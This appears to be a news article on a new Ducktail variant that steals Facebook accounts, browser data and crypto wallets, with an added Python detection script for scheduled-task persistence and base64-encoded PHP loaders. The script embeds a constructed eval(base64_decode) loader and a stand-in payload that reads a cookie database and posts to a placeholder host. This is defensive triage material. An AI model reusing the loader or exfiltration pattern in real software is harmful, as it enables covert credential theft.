An information-stealing script written in PHP is targeting Facebook users' accounts. The malware is a new variant of Ducktail. Besides Facebook accounts, the script can also access data stored in the browser and in cryptocurrency wallets.
Ducktail was first documented a few months ago and mainly targets individuals and companies that use Facebook Business accounts. The program took over a year to develop and was distributed by email. The attackers use social engineering and scout for targets on the career network LinkedIn. The malware is delivered as an archive that also contains images, videos, and documents. Once the file is downloaded and opened, browser cookies are read and sent to the attackers' server.
A new version of the malware has now been discovered that is harder for antivirus software to detect. According to Zscaler, a fake application is installed that bundles a PHP interpreter together with several script files. To keep these components running, the malware creates entries in the Windows Task Scheduler. The code that actually steals Facebook accounts is a base64-encoded PHP script. It is decoded directly in memory, so the decoded code is never written to disk, which means file-based scanners will not necessarily recognize it.
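The two traits just described, persistence through a scheduled task that launches a dropped PHP interpreter and a payload that only exists in clear text after base64 decoding, are what a responder would look for on a suspect host. The following script is an added example written for this page; it is not code from the article, from Zscaler, or from the malware. The scheduled-task XML (in the format `schtasks /query /xml` exports), the file paths, the list of user-writable directories, and the PHP loader and payload are all constructed stand-ins; the heuristics are assumptions that should be tuned to the environment.

```python
"""Triage helpers for two Ducktail-style traits:
(1) a scheduled task that runs a bundled PHP interpreter from a user-writable path,
(2) a PHP loader carrying a base64-encoded script that is decoded at run time.
Added example; every sample below is constructed, not captured from real malware.
"""
import base64
import re
import xml.etree.ElementTree as ET

# Assumption: path fragments that mark user-writable locations where a dropped
# interpreter would typically live. Adjust for the environment being examined.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
# Assumption: interpreter binaries worth flagging when launched by a task.
INTERPRETERS = {"php.exe", "php-win.exe"}


def _local(tag):
    """Strip the namespace prefix that Task Scheduler XML exports carry."""
    return tag.rsplit("}", 1)[-1]


def task_findings(task_xml):
    """Return reasons a scheduled task looks like a PHP launcher (empty = clean)."""
    root = ET.fromstring(task_xml)
    findings = []
    for elem in root.iter():
        if _local(elem.tag) != "Exec":
            continue
        cmd, args = "", ""
        for child in elem:
            if _local(child.tag) == "Command":
                cmd = (child.text or "").strip().strip('"')
            elif _local(child.tag) == "Arguments":
                args = child.text or ""
        exe = cmd.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if exe in INTERPRETERS:
            findings.append(f"launches PHP interpreter: {cmd}")
        if any(frag in cmd.lower() for frag in USER_WRITABLE):
            findings.append(f"binary in user-writable path: {cmd}")
        if ".php" in args.lower():
            findings.append(f"runs PHP script: {args.strip()}")
    return findings


# Long base64 literals; short identifiers are ignored to limit noise.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Strings whose presence in decoded data suggests it is PHP source.
PHP_MARKERS = ("<?php", "eval(", "base64_decode(", "curl_")


def decoded_php_blobs(source):
    """Decode every long base64 literal in a loader; return those that are PHP code."""
    out = []
    for match in B64_BLOB.finditer(source):
        try:
            text = base64.b64decode(match.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 or not text: skip
        if any(marker in text for marker in PHP_MARKERS):
            out.append(text)
    return out


# Constructed task export: a logon-triggered task running php.exe from %TEMP%.
TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\alice\\AppData\\Local\\Temp\\phpapp\\php.exe</Command>
      <Arguments>-f C:\\Users\\alice\\AppData\\Local\\Temp\\phpapp\\main.php</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign task for comparison.
CLEAN_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec><Command>C:\\Windows\\System32\\wsqmcons.exe</Command></Exec>
  </Actions>
</Task>"""

# Constructed stand-in for the encoded stealer body (does nothing harmful).
PAYLOAD_SRC = (
    "<?php\n"
    "// constructed stand-in for the real stealer body\n"
    '$data = file_get_contents("cookies.db");\n'
    'curl_exec(curl_init("https://example.invalid/upload"));\n'
)
# Constructed loader in the eval(base64_decode(...)) pattern; the blob is
# built here so the sample stays self-consistent.
LOADER_SRC = (
    "<?php\n"
    "$k = '" + base64.b64encode(PAYLOAD_SRC.encode()).decode() + "';\n"
    "eval(base64_decode($k));\n"
)

if __name__ == "__main__":
    for name, xml_text in (("suspicious", TASK_XML), ("clean", CLEAN_XML)):
        print(name, "->", task_findings(xml_text) or "no findings")
    for blob in decoded_php_blobs(LOADER_SRC):
        print("decoded payload:\n" + blob)
```

On a live host the task XML comes from `schtasks /query /tn <name> /xml` and the loader from the dropped script directory; the decoded output is what `eval()` would have executed in memory, which is the artifact a file-based scanner never sees.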
Developers targeting personal accounts
Besides business accounts, Ducktail is reported to target the accounts of private users as well. If a business account is hijacked, an attempt is made to access its payment-method information. Given this continued development, it can be assumed that the group behind the malware will keep working on it and release further variants. As usual, it is advisable to be wary of messages from unknown senders and to inspect files closely before downloading them, to avoid installing malware.